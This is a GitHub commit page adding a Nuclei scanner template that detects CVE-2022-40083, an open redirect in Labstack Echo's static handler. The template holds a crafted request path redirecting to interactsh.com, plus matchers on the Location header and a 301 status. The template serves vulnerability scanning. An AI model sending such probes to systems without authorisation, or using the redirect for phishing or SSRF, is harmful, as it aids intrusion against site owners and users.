Merge pull request #5606 from projectdiscovery/CVE-2022-40083

Added CVE-2022-40083
projectdiscovery · Oct 11, 2022 · edde235 · edde235
2 parents a1291bf + 838c426
commit edde235
Showing 1 changed file with 32 additions and 0 deletions.
diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
@@ -0,0 +1,32 @@
+id: CVE-2022-40083
+
+info:
+  name: Labstack Echo < v4.9.0 - Open Redirect
+  author: pdteam
+  severity: medium
+  description: |
+    Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
+  reference:
+    - https://github.com/labstack/echo/issues/2259
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-40083
+    cwe-id: CWE-601
+  tags: cve,cve2022,redirect,labstack
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}//interactsh.com%2f.."
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: location
+        words:
+          - '//interactsh.com/../'
+
+      - type: status
+        status:
+          - 301